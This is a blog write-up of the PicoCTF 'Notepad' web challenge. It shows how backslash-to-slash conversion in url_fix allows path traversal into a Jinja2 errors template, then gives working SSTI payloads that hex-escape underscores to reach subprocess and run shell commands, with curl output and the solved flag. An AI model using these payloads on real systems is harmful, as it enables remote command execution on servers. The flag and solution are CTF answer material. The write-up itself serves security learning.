<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=e60aae304e72f02a09dbc4d6f1f78959d3c77b94">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>notepad WU | HSw109</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="notepad WU" />
<meta name="author" content="HSw109" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Notepad - PicoCTF" />
<meta property="og:description" content="Notepad - PicoCTF" />
<link rel="canonical" href="http://localhost:4000/write-up/picoctf/2024/09/15/notepad.html" />
<meta property="og:url" content="http://localhost:4000/write-up/picoctf/2024/09/15/notepad.html" />
<meta property="og:site_name" content="HSw109" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-09-15T15:23:10+07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="notepad WU" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"HSw109"},"dateModified":"2024-09-15T15:23:10+07:00","datePublished":"2024-09-15T15:23:10+07:00","description":"Notepad - PicoCTF","headline":"notepad WU","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/write-up/picoctf/2024/09/15/notepad.html"},"url":"http://localhost:4000/write-up/picoctf/2024/09/15/notepad.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>HSw109</h1>
        </a>
        <h2>just me hsw109</h2>

        <section id="downloads">
          <!--  -->
          <a href="http://localhost:4000/write-up" class="btn">Write-up</a>
          <a href="http://localhost:4000/about" class="btn">About</a>
          <a href="http://localhost:4000/guide" class="btn">Guide page</a>
          <a href="https://github.com/HSw109" class="btn btn-github"><span class="icon"></span>Github</a>

        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>15 September 2024</small>
<h1>notepad WU</h1>

<p class="view">by HSw109</p>

<h1 id="notepad---picoctf">Notepad - PicoCTF</h1>

<h2 id="apppy">app.py</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/user/&lt;name&gt;'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">greet_user</span><span class="p">(</span><span class="n">name</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'greet.html'</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="n">name</span><span class="p">)</span>
</code></pre></div></div>

<p>https://notepad.mars.picoctf.net/ render <strong>index.html</strong> with context variable “error” .</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">"/new"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">"POST"</span><span class="p">])</span>
<span class="k">def</span> <span class="nf">create</span><span class="p">():</span>
    <span class="n">content</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"content"</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>
    <span class="k">if</span> <span class="s">"_"</span> <span class="ow">in</span> <span class="n">content</span> <span class="ow">or</span> <span class="s">"/"</span> <span class="ow">in</span> <span class="n">content</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s">"index"</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="s">"bad_content"</span><span class="p">))</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">content</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">512</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s">"index"</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="s">"long_content"</span><span class="p">,</span> <span class="nb">len</span><span class="o">=</span><span class="nb">len</span><span class="p">(</span><span class="n">content</span><span class="p">)))</span>
    <span class="n">name</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"static/</span><span class="si">{</span><span class="n">url_fix</span><span class="p">(</span><span class="n">content</span><span class="p">[</span><span class="si">:</span><span class="mi">128</span><span class="p">])</span><span class="si">}</span><span class="s">-</span><span class="si">{</span><span class="n">token_urlsafe</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span><span class="si">}</span><span class="s">.html"</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="s">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">content</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
</code></pre></div></div>
<p>https://notepad.mars.picoctf.net/new for uploading notes. Variable <strong>content</strong> is taken from the HTML form, filtered with ‘_’ and ‘/’ and if occur, redirect to error html. If not, store new file html note in folder static with file name is <code class="language-plaintext highlighter-rouge">static/{url_fix(content[:128])}-{token_urlsafe(8)}.html</code></p>

<h3 id="url_fix">url_fix()</h3>
<p>Its deprecated in the werkberg library (<a href="https://tedboy.github.io/flask/generated/werkzeug.url_fix.html">here</a>). Source:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">url_fix</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">charset</span><span class="o">=</span><span class="s">'utf-8'</span><span class="p">):</span>
    <span class="sa">r</span><span class="s">"""Sometimes you get an URL by a user that just isn't a real URL because
 it contains unsafe characters like ' ' and so on. This function can fix
 some of the problems in a similar way browsers handle data entered by the
 user:

 &gt;&gt;&gt; url_fix(u'http://de.wikipedia.org/wiki/Elf (Begriffskl\xe4rung)')
 'http://de.wikipedia.org/wiki/Elf%20(Begriffskl%C3%A4rung)'

 :param s: the string with the URL to fix.
 :param charset: The target charset for the URL if the url was given as
 unicode string.
 """</span>
    <span class="c1"># First step is to switch to unicode processing and to convert
</span>    <span class="c1"># backslashes (which are invalid in URLs anyways) to slashes.  This is
</span>    <span class="c1"># consistent with what Chrome does.
</span>    <span class="n">s</span> <span class="o">=</span> <span class="n">to_unicode</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">charset</span><span class="p">,</span> <span class="s">'replace'</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">'</span><span class="se">\\</span><span class="s">'</span><span class="p">,</span> <span class="s">'/'</span><span class="p">)</span>

    <span class="c1"># For the specific case that we look like a malformed windows URL
</span>    <span class="c1"># we want to fix this up manually:
</span>    <span class="k">if</span> <span class="n">s</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'file://'</span><span class="p">)</span> <span class="ow">and</span> <span class="n">s</span><span class="p">[</span><span class="mi">7</span><span class="p">:</span><span class="mi">8</span><span class="p">].</span><span class="n">isalpha</span><span class="p">()</span> <span class="ow">and</span> <span class="n">s</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">10</span><span class="p">]</span> <span class="ow">in</span> <span class="p">(</span><span class="s">':/'</span><span class="p">,</span> <span class="s">'|/'</span><span class="p">):</span>
        <span class="n">s</span> <span class="o">=</span> <span class="s">'file:///'</span> <span class="o">+</span> <span class="n">s</span><span class="p">[</span><span class="mi">7</span><span class="p">:]</span>

    <span class="n">url</span> <span class="o">=</span> <span class="n">url_parse</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
    <span class="n">path</span> <span class="o">=</span> <span class="n">url_quote</span><span class="p">(</span><span class="n">url</span><span class="p">.</span><span class="n">path</span><span class="p">,</span> <span class="n">charset</span><span class="p">,</span> <span class="n">safe</span><span class="o">=</span><span class="s">'/%+$!*</span><span class="se">\'</span><span class="s">(),'</span><span class="p">)</span>
    <span class="n">qs</span> <span class="o">=</span> <span class="n">url_quote_plus</span><span class="p">(</span><span class="n">url</span><span class="p">.</span><span class="n">query</span><span class="p">,</span> <span class="n">charset</span><span class="p">,</span> <span class="n">safe</span><span class="o">=</span><span class="s">':&amp;%=+$!*</span><span class="se">\'</span><span class="s">(),'</span><span class="p">)</span>
    <span class="n">anchor</span> <span class="o">=</span> <span class="n">url_quote_plus</span><span class="p">(</span><span class="n">url</span><span class="p">.</span><span class="n">fragment</span><span class="p">,</span> <span class="n">charset</span><span class="p">,</span> <span class="n">safe</span><span class="o">=</span><span class="s">':&amp;%=+$!*</span><span class="se">\'</span><span class="s">(),'</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">to_native</span><span class="p">(</span><span class="n">url_unparse</span><span class="p">((</span><span class="n">url</span><span class="p">.</span><span class="n">scheme</span><span class="p">,</span> <span class="n">url</span><span class="p">.</span><span class="n">encode_netloc</span><span class="p">(),</span>
                                  <span class="n">path</span><span class="p">,</span> <span class="n">qs</span><span class="p">,</span> <span class="n">anchor</span><span class="p">)))</span>
</code></pre></div></div>

<p>Notice that we have</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">s</span> <span class="o">=</span> <span class="n">to_unicode</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">charset</span><span class="p">,</span> <span class="s">'replace'</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">'</span><span class="se">\\</span><span class="s">'</span><span class="p">,</span> <span class="s">'/'</span><span class="p">)</span>
</code></pre></div></div>
<p>which is crucial for bypass “/” filter.</p>

<h2 id="indexhtml">index.html</h2>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="cp">&lt;!doctype  html&gt;</span>
    {% if error is not none %}
		    <span class="nt">&lt;h3&gt;</span>
		    error: {{ error }}
		    <span class="nt">&lt;/h3&gt;</span>
		    {% include "errors/" + error + ".html" ignore missing %}
    {% endif %}
    <span class="nt">&lt;h2&gt;</span>make a new note<span class="nt">&lt;/h2&gt;</span>
    <span class="nt">&lt;form</span>  <span class="na">action=</span><span class="s">"/new"</span>  <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;textarea</span>  <span class="na">name=</span><span class="s">"content"</span><span class="nt">&gt;&lt;/textarea&gt;</span>
    <span class="nt">&lt;input</span>  <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;/form&gt;</span> 
</code></pre></div></div>

<p>Here, flask used Jinja2 (can SSTI). The <strong>sink</strong> could be the jinja template. Since https://notepad.mars.picoctf.net/?error=7*7 not works, cause the server treats the error string, so the Jinja template could not evaluate it.</p>

<p>=&gt; <strong>Sink</strong>: {% include “errors/” + error + “.html” ignore missing %}</p>

<p>To do that, we have:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">name</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"static/</span><span class="si">{</span><span class="n">url_fix</span><span class="p">(</span><span class="n">content</span><span class="p">[</span><span class="si">:</span><span class="mi">128</span><span class="p">])</span><span class="si">}</span><span class="s">-</span><span class="si">{</span><span class="n">token_urlsafe</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span><span class="si">}</span><span class="s">.html"</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="s">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">content</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
</code></pre></div></div>
<p>From there, we can perform directory traversal to folder <strong>errors</strong>, then by</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> {% include "errors/" + error + ".html" ignore missing %}
</code></pre></div></div>

<p>we evaluate SSTI payload.</p>

<h2 id="exploit">Exploit</h2>
<p>With use of url_fix(). We note:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make a new note

..\templates\errors\123abc
</code></pre></div></div>

<p>=&gt; Redirect to: https://notepad.mars.picoctf.net/templates/errors/123abc%0D%0A-4vnyXEK_tLc.html. Then we access it. 
=&gt; https://notepad.mars.picoctf.net/?error=123abc%0D%0A-4vnyXEK_tLc</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>error: 123abc -4vnyXEK_tLc

 make a new note
</code></pre></div></div>

<p>Do the same with simple payload {{7*7}}</p>

<p>=&gt;</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>error: 123abc {{7*7}}-mAQRWwnJPVg


make a new note
</code></pre></div></div>

<p>Since it in the name of file, we cant evaluate it, to do this: from <strong>app.py</strong>:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">name</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"static/</span><span class="si">{</span><span class="n">url_fix</span><span class="p">(</span><span class="n">content</span><span class="p">[</span><span class="si">:</span><span class="mi">128</span><span class="p">])</span><span class="si">}</span><span class="s">-</span><span class="si">{</span><span class="n">token_urlsafe</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span><span class="si">}</span><span class="s">.html"</span>
</code></pre></div></div>

<p>After processing with <code class="language-plaintext highlighter-rouge">url_fix()</code>, the <code class="language-plaintext highlighter-rouge">{{7*7}}</code> expression contained special character <code class="language-plaintext highlighter-rouge">{</code> and <code class="language-plaintext highlighter-rouge">}</code>. So if its exist in the URL, we just pass the value of variable <code class="language-plaintext highlighter-rouge">error</code>, not the file that we made.</p>

<p>So what we need is make the content longer, then the payload is outbound of 128 characters =&gt;
URL path is valid for access =&gt; SSTI!</p>

<p><strong>Payload:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>..\templates\errors\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa{{7*7}}
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
    <span class="nv">$ </span>curl https://notepad.mars.picoctf.net/?error<span class="o">=</span>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-nmraL3m59zo
    &lt;<span class="o">!</span>doctype html&gt;
    
      &lt;h3&gt;
        error: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-nmraL3m59zo
      &lt;/h3&gt;
      ..<span class="se">\t</span>emplates<span class="se">\e</span>rrors<span class="se">\a</span>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa49
    
    &lt;h2&gt;make a new note&lt;/h2&gt;
    &lt;form <span class="nv">action</span><span class="o">=</span><span class="s2">"/new"</span> <span class="nv">method</span><span class="o">=</span><span class="s2">"POST"</span><span class="o">&gt;</span>
      &lt;textarea <span class="nv">name</span><span class="o">=</span><span class="s2">"content"</span><span class="o">&gt;</span>&lt;/textarea&gt;
      &lt;input <span class="nb">type</span><span class="o">=</span><span class="s2">"submit"</span><span class="o">&gt;</span>
    &lt;/form&gt;
</code></pre></div></div>

<p>Then we got this “49”.
After a long while to craft my payload with <a href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti">HackTricks</a>, here is my payload for by pass the <code class="language-plaintext highlighter-rouge">_</code></p>

<p><strong>Payload:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{{request['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][11]['\x5f\x5fsubclasses\x5f\x5f']()[273]("ls", shell=True, stdout=-1).communicate()[0].strip()}}
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>curl https://notepad.mars.picoctf.net/?error<span class="o">=</span>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-wVxNUWfAtG4
&lt;<span class="o">!</span>doctype html&gt;

  &lt;h3&gt;
    error: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-wVxNUWfAtG4
  &lt;/h3&gt;
  ..<span class="se">\t</span>emplates<span class="se">\e</span>rrors<span class="se">\a</span>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab&amp;#39<span class="p">;</span>app.py<span class="se">\n</span>flag-c8f5526c-4122-4578-96de-d7dd27193798.txt<span class="se">\n</span>static<span class="se">\n</span>templates&amp;#39<span class="p">;</span>

&lt;h2&gt;make a new note&lt;/h2&gt;
&lt;form <span class="nv">action</span><span class="o">=</span><span class="s2">"/new"</span> <span class="nv">method</span><span class="o">=</span><span class="s2">"POST"</span><span class="o">&gt;</span>
  &lt;textarea <span class="nv">name</span><span class="o">=</span><span class="s2">"content"</span><span class="o">&gt;</span>&lt;/textarea&gt;
  &lt;input <span class="nb">type</span><span class="o">=</span><span class="s2">"submit"</span><span class="o">&gt;</span>
&lt;/form&gt;
</code></pre></div></div>
<p>Do the last round for the flag:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{{request['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][11]['\x5f\x5fsubclasses\x5f\x5f']()[273]("cat flag-c8f5526c-4122-4578-96de-d7dd27193798.txt", shell=True, stdout=-1).communicate()[0].strip()}}
</code></pre></div></div>

<blockquote>
  <p>picoCTF{styl1ng_susp1c10usly_s1m1l4r_t0_p4steb1n}</p>
</blockquote>




  <small>tags: <em>web</em></small>


      </section>
    </div>
  </body>
</html>
